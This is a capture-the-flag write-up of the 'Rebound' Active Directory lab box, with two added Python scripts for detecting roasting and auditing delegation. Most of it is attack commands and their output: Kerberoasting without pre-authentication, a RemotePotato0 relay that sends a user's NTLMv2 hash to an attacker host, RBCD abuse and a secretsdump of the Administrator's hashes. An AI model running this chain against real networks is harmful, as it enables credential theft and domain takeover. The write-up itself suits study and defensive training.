A Windows machine comprising a multitude of Active Directory vulnerabilities.
Enumeration
```
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ sudo nmap -sC -sV -Pn 10.10.11.231
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 23:27 EST
Nmap scan report for rebound.htb (10.10.11.231)
Host is up (0.053s latency).
Not shown: 989 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-24 11:27:38Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:26+00:00; +7h00m01s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-12-24T11:28:27+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:26+00:00; +7h00m01s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:27+00:00; +7h00m01s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
| smb2-time:
|   date: 2023-12-24T11:28:20
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.41 seconds
```
Enumerating SMB and LDAP yielded nothing. However, I was able to connect to SMB unauthenticated (with no share permissions) using rpcclient, so I proceeded to enumerate potential users with RID cycling.
```
┌──(kali㉿kali)-[~/Desktop/CTF/Windows Stuff]
└─$ crackmapexec smb 10.10.11.231 -u "Guest" -p ''
SMB         10.10.11.231    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.231    445    DC01             [+] rebound.htb\Guest:

┌──(kali㉿kali)-[~/Desktop/CTF/Windows Stuff]
└─$ ridenum 10.10.11.231 0 20000 Guest ''
[*] Attempting lsaquery first...This will enumerate the base domain SID
[*] Successfully enumerated base domain SID. Printing information:
Domain Name: rebound
Domain Sid: S-1-5-21-4078382237-1492182817-2568127209
[*] Moving on to extract via RID cycling attack..
[*] Enumerating user accounts.. This could take a little while.
Account name: rebound\Administrator
Account name: rebound\Guest
Account name: rebound\krbtgt
Account name: rebound\DC01$
Account name: rebound\ppaul
Account name: rebound\llune
Account name: rebound\fflock
Account name: rebound\jjones
Account name: rebound\mmalone
Account name: rebound\nnoon
Account name: rebound\ldap_monitor
Account name: rebound\oorend
Account name: rebound\winrm_svc
Account name: rebound\batch_runner
Account name: rebound\tbrady
Account name: rebound\delegator$
[*] RIDENUM has finished enumerating user accounts...
```
I then tried AS-REP roasting, hoping for a quick win for initial access, but could not crack the hash, which probably meant this was not the intended path.
```
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-GetNPUsers -dc-ip 10.10.11.231 -request -format hashcat -usersfile users.txt rebound.htb/
Impacket v0.11.0 - Copyright 2023 Fortra

$krb5asrep$23$jjones@REBOUND.HTB:06a2bf6dd3cfdb587387c2d53bf69a0c$f3b60b15f622dbbde4153402b6320449e99e574a4f5c691fe415cec470cb8f52c3d4d3ae1d2c0029b23f7cab1751aaa493cf48c63c93358774333705ee62c827d33ee30503a81955ae1105ba4532d106c8ec07611af9c23b3d43a57f12c92f9cac5cb1c13a0f3576dde3fa29b2e1e484c227e615ea196a9fef98a31c552767e2b73892228cf77e55607adc1fb82712d39537f5c88db47c8e12c1d713789de07c6f561d5a86f0cbecf54c9e7232355c8af83c69aa60fc54915019b7e965496a5b15fa6dbfc45a9df367033a9233bf20a64b7aa8356fc300f9c906cef1c308b33a58c01057f3b332638f1b
[-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
```
After a very long time, I stumbled across this article on Kerberoasting without pre-authentication. Similar to AS-REP roasting, the technique relies on two things we already have: an account that does not require pre-authentication (jjones) and a list of usernames to request service tickets for.
To keep myself sane after all the impacket branch errors I was receiving, I decided to use a Windows VM and perform the attack with Rubeus and its /nopreauth parameter.
```
PS C:\Users\nicholas\Desktop> ./Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"rebound.htb" /dc:"DC01.rebound.htb" /nopreauth:"jjones" /spns:C:\Users\nicholas\Desktop\users.txt

Rubeus v2.3.1

[*] Action: Kerberoasting

[*] Using jjones without pre-auth to request service tickets

[*] Target SPN             : Administrator
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN             : Guest
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN             : krbtgt
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt
[*] Target SPN             : DC01$
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt
[*] Target SPN             : ppaul
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN             : llune
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN             : fflock
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN             : jjones
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN             : mmalone
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN             : nnoon
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN             : ldap_monitor
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt
[*] Target SPN             : oorend
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN             : winrm_svc
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN             : batch_runner
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN             : tbrady
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN             : delegator$
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt

[*] Roasted hashes written to : C:\Users\nicholas\Desktop\kerberoastables.txt
```
We can now crack these hashes with hashcat and rockyou, which gives us the password of ldap_monitor.
After obtaining domain credentials, I mapped the domain with BloodHound and could see a route for lateral movement to user access, but not with the users we had on hand.
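As an added defensive example (not code from the original writeup), the following Python checks constructed domain-controller Security-log records for the patterns used above: AS-REQs from an account with pre-authentication disabled, AS-REQs whose service name is not krbtgt (service tickets requested straight from the AS, as Rubeus /nopreauth does), RC4 TGS requests for user SPNs, and one requester roasting many services. The event field names follow the 4768/4769 event XML; the sample records, their values and the threshold are assumptions.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23; AES etypes are 0x11/0x12

def ev(event_id, user, service, preauth, etype, ip):
    """Build one constructed DC Security-log record using the 4768/4769 field names."""
    return {"EventID": event_id, "TargetUserName": user, "ServiceName": service,
            "PreAuthType": preauth, "TicketEncryptionType": etype, "IpAddress": ip}

# Constructed sample, not real logs from the box: jjones (no pre-auth) asks the AS for
# service tickets directly, as the Rubeus run above does; tbrady is ordinary traffic.
EVENTS = [
    ev(4768, "jjones", "krbtgt", 0, RC4_HMAC, "10.10.16.17"),
    ev(4768, "jjones", "ldap_monitor", 0, RC4_HMAC, "10.10.16.17"),
    ev(4768, "jjones", "delegator$", 0, RC4_HMAC, "10.10.16.17"),
    ev(4768, "jjones", "dc01$", 0, RC4_HMAC, "10.10.16.17"),
    ev(4768, "tbrady", "krbtgt", 2, 0x12, "10.10.11.50"),
    ev(4769, "tbrady@REBOUND.HTB", "DC01$", None, 0x12, "10.10.11.50"),
    ev(4769, "oorend@REBOUND.HTB", "ldap_monitor", None, RC4_HMAC, "10.10.16.17"),
]

def analyse(events, spn_threshold=3):
    """Return sorted (rule, requester, detail) findings for the roasting patterns on this page."""
    findings = set()
    services_by_requester = defaultdict(set)
    for e in events:
        who = e["TargetUserName"].split("@")[0].lower()
        svc = e["ServiceName"].lower()
        if e["EventID"] == 4768:
            if e["PreAuthType"] == 0:  # account has DONT_REQUIRE_PREAUTH set (AS-REP roastable)
                findings.add(("no_preauth_account", who, e["IpAddress"]))
            if svc != "krbtgt":  # AS-REQ naming a service: Kerberoast without pre-auth
                findings.add(("as_requested_service_ticket", who, svc))
                services_by_requester[who].add(svc)
        elif e["EventID"] == 4769:
            if e["TicketEncryptionType"] == RC4_HMAC and not svc.endswith("$"):
                findings.add(("rc4_tgs_for_user_spn", who, svc))  # classic Kerberoast indicator
                services_by_requester[who].add(svc)
    for who, svcs in services_by_requester.items():
        if len(svcs) >= spn_threshold:  # one principal requesting tickets for many services
            findings.add(("bulk_spn_requests", who, "%d distinct services" % len(svcs)))
    return sorted(findings)
```

The same rules apply to events exported from a SIEM; the per-requester threshold should be tuned to the environment's normal service-ticket volume.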
From the graph above, our main goal is one of the following:
Obtain either the PPAUL or FFLOCK user account, OR
Enroll ourselves as a member of the SERVICEMGMT group somehow
Obtain either PPAUL or FFLOCK user account
Using the password obtained from the ldap_monitor account, I performed password spraying with crackmapexec and got a match on the user oorend.
Sadly, the spray did not work on either PPAUL or FFLOCK.
Enroll ourselves as a group member of SERVICEMGMT somehow
I then remembered that some ACL permissions are not shown explicitly in BloodHound and must be enumerated separately with something like PowerView's FindDomainObjectAcl. However, I kept receiving the error "Server not operational".
I then struggled to find a Linux alternative until I finally stumbled across impacket's dacledit, which lets me enumerate whether the principal oorend has any permissions over the target SERVICEMGMT group.
From here, we can use RemotePotato0, which lets us capture the NTLMv2 hash of any user logged in on the target machine, in this case tbrady.
```
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999
```

```
PS C:\Users\winrm_svc\Documents> .\RemotePotato0.exe -m 2 -x 10.10.16.17 -p 9999 -s 1
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on (null) to your victim machine on port 9999
[*] Example Network redirector:
        sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] Spawning COM object in the session: 1
[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written: 104 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 9999
[+] User hash stolen!

NTLMv2 Client   : DC01
NTLMv2 Username : rebound\tbrady
NTLMv2 Hash     : tbrady::rebound:25cb25d078aa7cda:5d015a1e05ab333b0fc68d64bd26e5c7:01010000000000004c7bf203dc4bda0194875567cf8b3e9e0000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e00680074006200070008004c7bf203dc4bda0106000400060000000800300030000000000000000100000000200000dec4cf9ef2d2a48c6c2af0bea86ea62183c13f07d827c4a1ebcfecd25e1a2f800a00100000000000000000000000000000000000090000000000000000000000
```
Cracking it with rockyou, we get the password 543BOMBOMBUNmanda.
Looking back at BloodHound, we see that the user tbrady has ReadGMSAPassword over DELEGATOR$.
The name of the account suggests something involving delegation. To enumerate the delegation properties of the DELEGATOR$ account, we use PowerView's Get-NetComputer and filter the properties.
We see that DELEGATOR$ has the msDS-AllowedToDelegateTo property set to the service http/dc01.rebound.htb.
However, from our BloodHound output, the Administrator user cannot be delegated.
With reference to this, RBCD (Resource-Based Constrained Delegation) can be used to bypass that restriction.
To perform this attack, we need two things, which we already have:
An account with an SPN: the ldap_monitor user fits the requirement
An account with the capability to edit the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of another object, OR
Using impacket's rbcd, we can exploit this by appending ldap_monitor to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of DELEGATOR$.
```
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-rbcd 'rebound.htb/delegator$' -delegate-to 'delegator$' -delegate-from ldap_monitor -use-ldaps -action write -k -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Accounts allowed to act on behalf of other identity:
[*]     ldap_monitor   (S-1-5-21-4078382237-1492182817-2568127209-7681)
[*] ldap_monitor can already impersonate users on delegator$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*]     ldap_monitor   (S-1-5-21-4078382237-1492182817-2568127209-7681)
```
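As an added audit example (not code from the writeup or from impacket), this Python parses the raw msDS-AllowedToActOnBehalfOfOtherIdentity security descriptor as it is read from LDAP and lists the SIDs granted ACCESS_ALLOWED entries, which is what a defender checks when reviewing which principals each computer account trusts for RBCD. The build_rbcd_descriptor helper is a constructed fixture that mimics the self-relative descriptor layout written by impacket-rbcd; the ldap_monitor SID is the one printed in the output above.

```python
import struct

ACCESS_ALLOWED_ACE_TYPE = 0
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000

def sid_to_bytes(sid):
    """Encode 'S-1-5-21-...' as a binary SID: revision, sub-auth count, 48-bit authority, 32-bit sub-auths."""
    parts = [int(p) for p in sid.split("-")[1:]]
    rev, auth, subs = parts[0], parts[1], parts[2:]
    return bytes([rev, len(subs)]) + auth.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def bytes_to_sid(buf, off):
    """Decode a binary SID at buf[off]; return (sid_string, offset_after_sid)."""
    rev, n = buf[off], buf[off + 1]
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % n, buf, off + 8)
    return "S-%d-%d-%s" % (rev, auth, "-".join(map(str, subs))), off + 8 + 4 * n

def build_rbcd_descriptor(sids, mask=0x000F01FF):
    """Constructed fixture: self-relative SD with one ACCESS_ALLOWED ACE per SID (no owner/group/SACL)."""
    aces = b""
    for sid in sids:
        s = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(s), mask) + s
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sids), 0) + aces  # ACL_REVISION_DS
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 0, 0, 0, 20)
    return header + acl  # DACL starts right after the 20-byte header

def allowed_to_act(sd):
    """Return the SIDs allowed to act on behalf of the object that carries this descriptor."""
    _, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []  # no DACL means nothing is delegated via RBCD
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    off, allowed = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            allowed.append(bytes_to_sid(sd, off + 8)[0])  # access mask at +4, SID at +8
        off += ace_size  # skip any other ACE types by their declared size
    return allowed
```

Resolving the returned SIDs to account names and comparing them against a list of approved delegations turns this into a recurring check for unexpected RBCD grants on computer accounts.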
We can now obtain a ticket via the delegation operation.
Once the ticket is obtained, it can be used in an S4U2Proxy request, made by DELEGATOR$ on behalf of the impersonated user, to obtain access to one of the services DELEGATOR$ can delegate to.
```
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-getST -spn "http/dc01.rebound.htb" -impersonate "dc01$" -additional-ticket "dc01$.ccache" "rebound.htb/delegator$" -hashes aad3b435b51404eeaad3b435b51404ee:177ae2598e4f659488b6cd0a237df1fc -k -no-pass -dc-ip 10.10.11.231
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating dc01$
[*] Using additional ticket dc01$.ccache instead of S4U2Self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$.ccache
```
Finally, we can dump the Administrator hash with secretsdump.
```
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-secretsdump -k dc01.rebound.htb -just-dc-user administrator -dc-ip 10.10.11.231 -debug
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /home/kali/.pyenv/versions/3.9.16/lib/python3.9/site-packages/impacket
[+] Using Kerberos Cache: dc01$.ccache
[+] Domain retrieved from CCache: rebound.htb
[+] SPN CIFS/DC01.REBOUND.HTB@REBOUND.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for HTTP/DC01.REBOUND.HTB@REBOUND.HTB
[+] Using TGS from cache
[+] Changing sname from http/dc01.rebound.htb@REBOUND.HTB to CIFS/DC01.REBOUND.HTB@REBOUND.HTB and hoping for the best
[+] Username retrieved from CCache: dc01$
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Calling DRSCrackNames for administrator
[+] Calling DRSGetNCChanges for {37857665-6e2e-4f12-9976-5c9babcd8282}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=rebound,DC=htb
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1
Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f
Administrator:des-cbc-md5:ad8ac2a825fe1080
[*] Cleaning up...
```